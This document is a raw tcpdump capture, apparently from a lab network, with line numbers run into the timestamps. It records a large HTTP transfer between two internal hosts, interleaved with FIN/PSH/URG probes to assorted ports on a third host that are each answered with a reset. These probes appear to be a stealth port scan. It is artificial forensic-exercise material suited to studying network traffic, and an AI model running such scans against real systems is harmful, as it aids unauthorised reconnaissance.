1 (6), length 40)
2 ip-10-10-148-177.eu-west-1.f (incorrect -> 0x2ec6), seq 25919214, ack 10844, win 482, options [nop,nop,TS val 997087424 ecr 3431983964], length 0
300:43:01.264574 IP (tos 0x0, ttl 64, id 24642, offset 0, flags [DF], proto TCP (6), length 68)
4 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0xc068 (correct), seq 10844:10860, ack 25919214, win 6347, options [nop,nop,TS val 3431983988 ecr 997087424], length 16: HTTP
500:43:01.264692 IP (tos 0x0, ttl 64, id 24448, offset 0, flags [DF], proto TCP (6), length 52)
6 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0x2e86), seq 25919214, ack 10860, win 482, options [nop,nop,TS val 997087448 ecr 3431983988], length 0
700:43:01.277428 IP (tos 0x0, ttl 64, id 24449, offset 0, flags [DF], proto TCP (6), length 62695)
8 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0x9fc3 (incorrect -> 0x0198), seq 25919214:25981857, ack 10860, win 482, options [nop,nop,TS val 997087461 ecr 3431983988], length 62643: HTTP
900:43:01.277641 IP (tos 0x0, ttl 64, id 24456, offset 0, flags [DF], proto TCP (6), length 2896)
10 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0xb62b (incorrect -> 0xc437), seq 25981857:25984701, ack 10860, win 482, options [nop,nop,TS val 997087461 ecr 3431983988], length 2844: HTTP
1100:43:01.277861 IP (tos 0x0, ttl 64, id 24643, offset 0, flags [DF], proto TCP (6), length 52)
12 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x2413 (correct), seq 10860, ack 25981857, win 6023, options [nop,nop,TS val 3431984001 ecr 997087461], length 0
1300:43:01.278729 IP (tos 0x0, ttl 64, id 24457, offset 0, flags [DF], proto TCP (6), length 49808)
14 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0x6d6c (incorrect -> 0xdba3), seq 25984701:26034457, ack 10860, win 482, options [nop,nop,TS val 997087462 ecr 3431984001], length 49756: HTTP
1500:43:01.279044 IP (tos 0x0, ttl 64, id 24644, offset 0, flags [DF], proto TCP (6), length 52)
16 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x8c8d (correct), seq 10860, ack 26020497, win 6171, options [nop,nop,TS val 3431984002 ecr 997087461], length 0
1700:43:01.279178 IP (tos 0x0, ttl 64, id 24645, offset 0, flags [DF], proto TCP (6), length 52)
18 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x5654 (correct), seq 10860, ack 26034457, win 6091, options [nop,nop,TS val 3431984002 ecr 997087462], length 0
1900:43:01.300692 IP (tos 0x0, ttl 64, id 24646, offset 0, flags [DF], proto TCP (6), length 68)
20 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x162d (correct), seq 10860:10876, ack 26034457, win 6347, options [nop,nop,TS val 3431984024 ecr 997087462], length 16: HTTP
2100:43:01.307395 IP (tos 0x0, ttl 43, id 20042, offset 0, flags [none], proto TCP (6), length 40)
22 ip-10-10-148-177.eu-west-1.compute.internal.50122 > ip-10-10-200-226.eu-west-1.compute.internal.50800: Flags [FPU], cksum 0x1124 (correct), seq 3180519713, win 1024, urg 0, length 0
2300:43:01.307809 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40)
24 ip-10-10-200-226.eu-west-1.compute.internal.50800 > ip-10-10-148-177.eu-west-1.compute.internal.50122: Flags [R.], cksum 0x1538 (correct), seq 0, ack 3180519714, win 0, length 0
2500:43:01.340331 IP (tos 0x0, ttl 64, id 24463, offset 0, flags [DF], proto TCP (6), length 62695)
26 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0x9fc3 (incorrect -> 0x8784), seq 26034457:26097100, ack 10876, win 482, options [nop,nop,TS val 997087524 ecr 3431984024], length 62643: HTTP
2700:43:01.340512 IP (tos 0x0, ttl 64, id 24470, offset 0, flags [DF], proto TCP (6), length 2896)
28 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0xb62b (incorrect -> 0xe78e), seq 26097100:26099944, ack 10876, win 482, options [nop,nop,TS val 997087524 ecr 3431984024], length 2844: HTTP
2900:43:01.340700 IP (tos 0x0, ttl 64, id 24647, offset 0, flags [DF], proto TCP (6), length 52)
30 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x6158 (correct), seq 10876, ack 26097100, win 6023, options [nop,nop,TS val 3431984064 ecr 997087524], length 0
3100:43:01.341746 IP (tos 0x0, ttl 64, id 24471, offset 0, flags [DF], proto TCP (6), length 57493)
32 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0x8b71 (incorrect -> 0xb438), seq 26099944:26157385, ack 10876, win 482, options [nop,nop,TS val 997087525 ecr 3431984064], length 57441: HTTP
3300:43:01.342068 IP (tos 0x0, ttl 64, id 24648, offset 0, flags [DF], proto TCP (6), length 52)
34 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x75b9 (correct), seq 10876, ack 26157385, win 6055, options [nop,nop,TS val 3431984065 ecr 997087524], length 0
3500:43:01.350522 IP (tos 0x0, ttl 64, id 24649, offset 0, flags [DF], proto TCP (6), length 68)
36 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0xcc87 (correct), seq 10876:10892, ack 26157385, win 6347, options [nop,nop,TS val 3431984074 ecr 997087524], length 16: HTTP
3700:43:01.387559 IP (tos 0x0, ttl 52, id 44283, offset 0, flags [none], proto TCP (6), length 40)
38 ip-10-10-148-177.eu-west-1.compute.internal.50121 > ip-10-10-200-226.eu-west-1.compute.internal.1069: Flags [FPU], cksum 0xd368 (correct), seq 3180585248, win 1024, urg 0, length 0
3900:43:01.388017 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40)
40 ip-10-10-200-226.eu-west-1.compute.internal.1069 > ip-10-10-148-177.eu-west-1.compute.internal.50121: Flags [R.], cksum 0xd77c (correct), seq 0, ack 3180585249, win 0, length 0
4100:43:01.391305 IP (tos 0x0, ttl 64, id 24478, offset 0, flags [DF], proto TCP (6), length 52)
42 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0x8b32), seq 26157385, ack 10892, win 482, options [nop,nop,TS val 997087575 ecr 3431984074], length 0
4300:43:01.416224 IP (tos 0x0, ttl 64, id 24650, offset 0, flags [DF], proto TCP (6), length 68)
44 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x157a (correct), seq 10892:10908, ack 26157385, win 6347, options [nop,nop,TS val 3431984139 ecr 997087575], length 16: HTTP
4500:43:01.416392 IP (tos 0x0, ttl 64, id 24479, offset 0, flags [DF], proto TCP (6), length 52)
46 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0x8ac8), seq 26157385, ack 10908, win 482, options [nop,nop,TS val 997087600 ecr 3431984139], length 0
4700:43:01.447462 IP (tos 0x0, ttl 64, id 24480, offset 0, flags [DF], proto TCP (6), length 62695)
48 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0x9fc3 (incorrect -> 0x5330), seq 26157385:26220028, ack 10908, win 482, options [nop,nop,TS val 997087631 ecr 3431984139], length 62643: HTTP
4900:43:01.447640 IP (tos 0x0, ttl 64, id 24487, offset 0, flags [DF], proto TCP (6), length 2896)
50 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0xb62b (incorrect -> 0x0eb5), seq 26220028:26222872, ack 10908, win 482, options [nop,nop,TS val 997087631 ecr 3431984139], length 2844: HTTP
5100:43:01.447812 IP (tos 0x0, ttl 64, id 24651, offset 0, flags [DF], proto TCP (6), length 52)
52 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x0b41 (correct), seq 10908, ack 26184232, win 6219, options [nop,nop,TS val 3431984171 ecr 997087631], length 0
5300:43:01.447832 IP (tos 0x0, ttl 64, id 24652, offset 0, flags [DF], proto TCP (6), length 52)
54 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x7524 (correct), seq 10908, ack 26222872, win 6007, options [nop,nop,TS val 3431984171 ecr 997087631], length 0
5500:43:01.448819 IP (tos 0x0, ttl 64, id 24488, offset 0, flags [DF], proto TCP (6), length 53862)
56 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0x7d42 (incorrect -> 0x3270), seq 26222872:26276682, ack 10908, win 482, options [nop,nop,TS val 997087632 ecr 3431984171], length 53810: HTTP
5700:43:01.449091 IP (tos 0x0, ttl 64, id 24653, offset 0, flags [DF], proto TCP (6), length 52)
58 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x2e34 (correct), seq 10908, ack 26240770, win 6267, options [nop,nop,TS val 3431984172 ecr 997087632], length 0
5900:43:01.449118 IP (tos 0x0, ttl 64, id 24654, offset 0, flags [DF], proto TCP (6), length 52)
60 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0xa2b1 (correct), seq 10908, ack 26276682, win 6069, options [nop,nop,TS val 3431984172 ecr 997087632], length 0
6100:43:01.454009 IP (tos 0x0, ttl 64, id 24655, offset 0, flags [DF], proto TCP (6), length 68)
62 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x264c (correct), seq 10908:10924, ack 26276682, win 6347, options [nop,nop,TS val 3431984177 ecr 997087632], length 16: HTTP
6300:43:01.467754 IP (tos 0x0, ttl 41, id 34770, offset 0, flags [none], proto TCP (6), length 40)
64 ip-10-10-148-177.eu-west-1.compute.internal.50121 > ip-10-10-200-226.eu-west-1.compute.internal.2041: Flags [FPU], cksum 0xcf9c (correct), seq 3180585248, win 1024, urg 0, length 0
6500:43:01.468111 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40)
66 ip-10-10-200-226.eu-west-1.compute.internal.2041 > ip-10-10-148-177.eu-west-1.compute.internal.50121: Flags [R.], cksum 0xd3b0 (correct), seq 0, ack 3180585249, win 0, length 0
6700:43:01.492453 IP (tos 0x0, ttl 64, id 24656, offset 0, flags [DF], proto TCP (6), length 68)
68 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x9b2a (correct), seq 10924:10940, ack 26276682, win 6347, options [nop,nop,TS val 3431984216 ecr 997087632], length 16: HTTP
6900:43:01.492496 IP (tos 0x0, ttl 64, id 24495, offset 0, flags [DF], proto TCP (6), length 52)
70 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0xb833), seq 26276682, ack 10940, win 482, options [nop,nop,TS val 997087676 ecr 3431984177], length 0
7100:43:01.525524 IP (tos 0x0, ttl 64, id 24496, offset 0, flags [DF], proto TCP (6), length 62695)
72 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0x9fc3 (incorrect -> 0xec98), seq 26276682:26339325, ack 10940, win 482, options [nop,nop,TS val 997087709 ecr 3431984177], length 62643: HTTP
7300:43:01.525721 IP (tos 0x0, ttl 64, id 24503, offset 0, flags [DF], proto TCP (6), length 2896)
74 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0xb62b (incorrect -> 0xd146), seq 26339325:26342169, ack 10940, win 482, options [nop,nop,TS val 997087709 ecr 3431984177], length 2844: HTTP
7500:43:01.525900 IP (tos 0x0, ttl 64, id 24657, offset 0, flags [DF], proto TCP (6), length 52)
76 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0xad71 (correct), seq 10940, ack 26339325, win 6023, options [nop,nop,TS val 3431984249 ecr 997087709], length 0
7700:43:01.526608 IP (tos 0x0, ttl 64, id 24504, offset 0, flags [DF], proto TCP (6), length 49093)
78 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0x6aa1 (incorrect -> 0x1828), seq 26342169:26391210, ack 10940, win 482, options [nop,nop,TS val 997087710 ecr 3431984249], length 49041: HTTP
7900:43:01.526937 IP (tos 0x0, ttl 64, id 24658, offset 0, flags [DF], proto TCP (6), length 52)
80 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0xf326 (correct), seq 10940, ack 26386914, win 6123, options [nop,nop,TS val 3431984250 ecr 997087709], length 0
8100:43:01.530054 IP (tos 0x0, ttl 64, id 24659, offset 0, flags [DF], proto TCP (6), length 68)
82 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x0e84 (correct), seq 10940:10956, ack 26391210, win 6347, options [nop,nop,TS val 3431984253 ecr 997087710], length 16: HTTP
8300:43:01.547948 IP (tos 0x0, ttl 53, id 48049, offset 0, flags [none], proto TCP (6), length 40)
84 ip-10-10-148-177.eu-west-1.compute.internal.50122 > ip-10-10-200-226.eu-west-1.compute.internal.1069: Flags [FPU], cksum 0xd367 (correct), seq 3180519713, win 1024, urg 0, length 0
8500:43:01.548349 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40)
86 ip-10-10-200-226.eu-west-1.compute.internal.1069 > ip-10-10-148-177.eu-west-1.compute.internal.50122: Flags [R.], cksum 0xd77b (correct), seq 0, ack 3180519714, win 0, length 0
8700:43:01.571378 IP (tos 0x0, ttl 64, id 24510, offset 0, flags [DF], proto TCP (6), length 52)
88 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0xf826), seq 26391210, ack 10956, win 482, options [nop,nop,TS val 997087755 ecr 3431984253], length 0
8900:43:01.588390 IP (tos 0x0, ttl 64, id 24660, offset 0, flags [DF], proto TCP (6), length 68)
90 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x5a42 (correct), seq 10956:10972, ack 26391210, win 6347, options [nop,nop,TS val 3431984311 ecr 997087755], length 16: HTTP
9100:43:01.588572 IP (tos 0x0, ttl 64, id 24511, offset 0, flags [DF], proto TCP (6), length 52)
92 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0xf7cb), seq 26391210, ack 10972, win 482, options [nop,nop,TS val 997087772 ecr 3431984311], length 0
9300:43:01.620113 IP (tos 0x0, ttl 64, id 24512, offset 0, flags [DF], proto TCP (6), length 62695)
94 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0x9fc3 (incorrect -> 0x95ad), seq 26391210:26453853, ack 10972, win 482, options [nop,nop,TS val 997087803 ecr 3431984311], length 62643: HTTP
9500:43:01.620337 IP (tos 0x0, ttl 64, id 24519, offset 0, flags [DF], proto TCP (6), length 2896)
96 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0xb62b (incorrect -> 0xb171), seq 26453853:26456697, ack 10972, win 482, options [nop,nop,TS val 997087804 ecr 3431984311], length 2844: HTTP
9700:43:01.620538 IP (tos 0x0, ttl 64, id 24661, offset 0, flags [DF], proto TCP (6), length 52)
98 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0xed32 (correct), seq 10972, ack 26453853, win 6023, options [nop,nop,TS val 3431984344 ecr 997087803], length 0
9900:43:01.621180 IP (tos 0x0, ttl 64, id 24520, offset 0, flags [DF], proto TCP (6), length 51025)
100 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0x722d (incorrect -> 0x1091), seq 26456697:26507670, ack 10972, win 482, options [nop,nop,TS val 997087804 ecr 3431984344], length 50973: HTTP
10100:43:01.621638 IP (tos 0x0, ttl 64, id 24662, offset 0, flags [DF], proto TCP (6), length 52)
102 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0xbdfb (correct), seq 10972, ack 26465646, win 6315, options [nop,nop,TS val 3431984345 ecr 997087804], length 0
10300:43:01.621654 IP (tos 0x0, ttl 64, id 24663, offset 0, flags [DF], proto TCP (6), length 52)
104 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x1ab3 (correct), seq 10972, ack 26507670, win 6091, options [nop,nop,TS val 3431984345 ecr 997087804], length 0
10500:43:01.624279 IP (tos 0x0, ttl 64, id 24664, offset 0, flags [DF], proto TCP (6), length 68)
106 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x0234 (correct), seq 10972:10988, ack 26507670, win 6347, options [nop,nop,TS val 3431984347 ecr 997087804], length 16: HTTP
10700:43:01.628148 IP (tos 0x0, ttl 58, id 3834, offset 0, flags [none], proto TCP (6), length 40)
108 ip-10-10-148-177.eu-west-1.compute.internal.50121 > ip-10-10-200-226.eu-west-1.compute.internal.50002: Flags [FPU], cksum 0x1443 (correct), seq 3180585248, win 1024, urg 0, length 0
10900:43:01.628589 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40)
110 ip-10-10-200-226.eu-west-1.compute.internal.50002 > ip-10-10-148-177.eu-west-1.compute.internal.50121: Flags [R.], cksum 0x1857 (correct), seq 0, ack 3180585249, win 0, length 0
11100:43:01.667290 IP (tos 0x0, ttl 64, id 24526, offset 0, flags [DF], proto TCP (6), length 52)
112 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0x305b), seq 26507670, ack 10988, win 482, options [nop,nop,TS val 997087851 ecr 3431984347], length 0
11300:43:01.673072 IP (tos 0x0, ttl 64, id 24665, offset 0, flags [DF], proto TCP (6), length 68)
114 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x80d0 (correct), seq 10988:11004, ack 26507670, win 6347, options [nop,nop,TS val 3431984396 ecr 997087851], length 16: HTTP
11500:43:01.673229 IP (tos 0x0, ttl 64, id 24527, offset 0, flags [DF], proto TCP (6), length 52)
116 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0x3014), seq 26507670, ack 11004, win 482, options [nop,nop,TS val 997087857 ecr 3431984396], length 0
11700:43:01.693950 IP (tos 0x0, ttl 64, id 24528, offset 0, flags [DF], proto TCP (6), length 62695)
118 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0x9fc3 (incorrect -> 0xa00a), seq 26507670:26570313, ack 11004, win 482, options [nop,nop,TS val 997087877 ecr 3431984396], length 62643: HTTP
11900:43:01.694174 IP (tos 0x0, ttl 64, id 24535, offset 0, flags [DF], proto TCP (6), length 2896)
120 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0xb62b (incorrect -> 0xd4cf), seq 26570313:26573157, ack 11004, win 482, options [nop,nop,TS val 997087877 ecr 3431984396], length 2844: HTTP
12100:43:01.694314 IP (tos 0x0, ttl 64, id 24666, offset 0, flags [DF], proto TCP (6), length 52)
122 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0xd367 (correct), seq 11004, ack 26525568, win 6267, options [nop,nop,TS val 3431984417 ecr 997087877], length 0
12300:43:01.694357 IP (tos 0x0, ttl 64, id 24667, offset 0, flags [DF], proto TCP (6), length 52)
124 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x2592 (correct), seq 11004, ack 26570313, win 6023, options [nop,nop,TS val 3431984417 ecr 997087877], length 0
12500:43:01.695237 IP (tos 0x0, ttl 64, id 24536, offset 0, flags [DF], proto TCP (6), length 56372)
126 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0x8710 (incorrect -> 0xb84e), seq 26573157:26629477, ack 11004, win 482, options [nop,nop,TS val 997087879 ecr 3431984417], length 56320: HTTP
12700:43:01.695565 IP (tos 0x0, ttl 64, id 24668, offset 0, flags [DF], proto TCP (6), length 52)
128 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0xd395 (correct), seq 11004, ack 26591055, win 6267, options [nop,nop,TS val 3431984419 ecr 997087877], length 0
12900:43:01.695663 IP (tos 0x0, ttl 64, id 24669, offset 0, flags [DF], proto TCP (6), length 52)
130 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x3e51 (correct), seq 11004, ack 26629477, win 6055, options [nop,nop,TS val 3431984419 ecr 997087879], length 0
13100:43:01.704028 IP (tos 0x0, ttl 64, id 24670, offset 0, flags [DF], proto TCP (6), length 68)
132 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x8f6b (correct), seq 11004:11020, ack 26629477, win 6347, options [nop,nop,TS val 3431984427 ecr 997087879], length 16: HTTP
13300:43:01.708350 IP (tos 0x0, ttl 44, id 26586, offset 0, flags [none], proto TCP (6), length 40)
134 ip-10-10-148-177.eu-west-1.compute.internal.50121 > ip-10-10-200-226.eu-west-1.compute.internal.3221: Flags [FPU], cksum 0xcb00 (correct), seq 3180585248, win 1024, urg 0, length 0
13500:43:01.708843 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40)
136 ip-10-10-200-226.eu-west-1.compute.internal.3221 > ip-10-10-148-177.eu-west-1.compute.internal.50121: Flags [R.], cksum 0xcf14 (correct), seq 0, ack 3180585249, win 0, length 0
13700:43:01.738530 IP (tos 0x0, ttl 64, id 24671, offset 0, flags [DF], proto TCP (6), length 70)
138 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x0d86 (correct), seq 11020:11038, ack 26629477, win 6347, options [nop,nop,TS val 3431984462 ecr 997087879], length 18: HTTP
13900:43:01.738578 IP (tos 0x0, ttl 64, id 24543, offset 0, flags [DF], proto TCP (6), length 52)
140 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0x53c1), seq 26629477, ack 11038, win 482, options [nop,nop,TS val 997087922 ecr 3431984427], length 0
14100:43:01.763935 IP (tos 0x0, ttl 64, id 24672, offset 0, flags [DF], proto TCP (6), length 68)
142 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0xfe5e (correct), seq 11038:11054, ack 26629477, win 6347, options [nop,nop,TS val 3431984487 ecr 997087922], length 16: HTTP
14300:43:01.788549 IP (tos 0x0, ttl 50, id 61856, offset 0, flags [none], proto TCP (6), length 40)
144 ip-10-10-148-177.eu-west-1.compute.internal.50121 > ip-10-10-200-226.eu-west-1.compute.internal.5800: Flags [FPU], cksum 0xc0ed (correct), seq 3180585248, win 1024, urg 0, length 0
14500:43:01.789163 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40)
146 ip-10-10-200-226.eu-west-1.compute.internal.5800 > ip-10-10-148-177.eu-west-1.compute.internal.50121: Flags [R.], cksum 0xc501 (correct), seq 0, ack 3180585249, win 0, length 0
14700:43:01.798617 IP (tos 0x0, ttl 64, id 24673, offset 0, flags [DF], proto TCP (6), length 68)
148 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0xc159 (correct), seq 11054:11070, ack 26629477, win 6347, options [nop,nop,TS val 3431984522 ecr 997087922], length 16: HTTP
14900:43:01.798659 IP (tos 0x0, ttl 64, id 24544, offset 0, flags [DF], proto TCP (6), length 52)
150 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0x5329), seq 26629477, ack 11070, win 482, options [nop,nop,TS val 997087982 ecr 3431984487], length 0
15100:43:01.806357 IP (tos 0x0, ttl 64, id 24545, offset 0, flags [DF], proto TCP (6), length 62695)
152 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0x9fc3 (incorrect -> 0x4ffe), seq 26629477:26692120, ack 11070, win 482, options [nop,nop,TS val 997087990 ecr 3431984487], length 62643: HTTP
15300:43:01.806595 IP (tos 0x0, ttl 64, id 24552, offset 0, flags [DF], proto TCP (6), length 2896)
154 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0xb62b (incorrect -> 0xfc4f), seq 26692120:26694964, ack 11070, win 482, options [nop,nop,TS val 997087990 ecr 3431984487], length 2844: HTTP
15500:43:01.806779 IP (tos 0x0, ttl 64, id 24674, offset 0, flags [DF], proto TCP (6), length 52)
156 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x48a1 (correct), seq 11070, ack 26692120, win 6019, options [nop,nop,TS val 3431984530 ecr 997087990], length 0
15700:43:01.808183 IP (tos 0x0, ttl 64, id 24553, offset 0, flags [DF], proto TCP (6), length 52618)
158 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0x7866 (incorrect -> 0x7032), seq 26694964:26747530, ack 11070, win 482, options [nop,nop,TS val 997087991 ecr 3431984530], length 52566: HTTP
15900:43:01.808500 IP (tos 0x0, ttl 64, id 24675, offset 0, flags [DF], proto TCP (6), length 52)
160 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x6fe4 (correct), seq 11070, ack 26747530, win 6091, options [nop,nop,TS val 3431984532 ecr 997087990], length 0
16100:43:01.838902 IP (tos 0x0, ttl 64, id 24676, offset 0, flags [DF], proto TCP (6), length 68)
162 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0xecc5 (correct), seq 11070:11086, ack 26747530, win 6347, options [nop,nop,TS val 3431984562 ecr 997087990], length 16: HTTP
16300:43:01.854816 IP (tos 0x0, ttl 64, id 24677, offset 0, flags [DF], proto TCP (6), length 70)
164 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0xf14c (correct), seq 11086:11104, ack 26747530, win 6347, options [nop,nop,TS val 3431984578 ecr 997087990], length 18: HTTP
16500:43:01.854940 IP (tos 0x0, ttl 64, id 24559, offset 0, flags [DF], proto TCP (6), length 52)
166 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0x855d), seq 26747530, ack 11104, win 482, options [nop,nop,TS val 997088038 ecr 3431984562], length 0
16700:43:01.860901 IP (tos 0x0, ttl 64, id 24560, offset 0, flags [DF], proto TCP (6), length 62695)
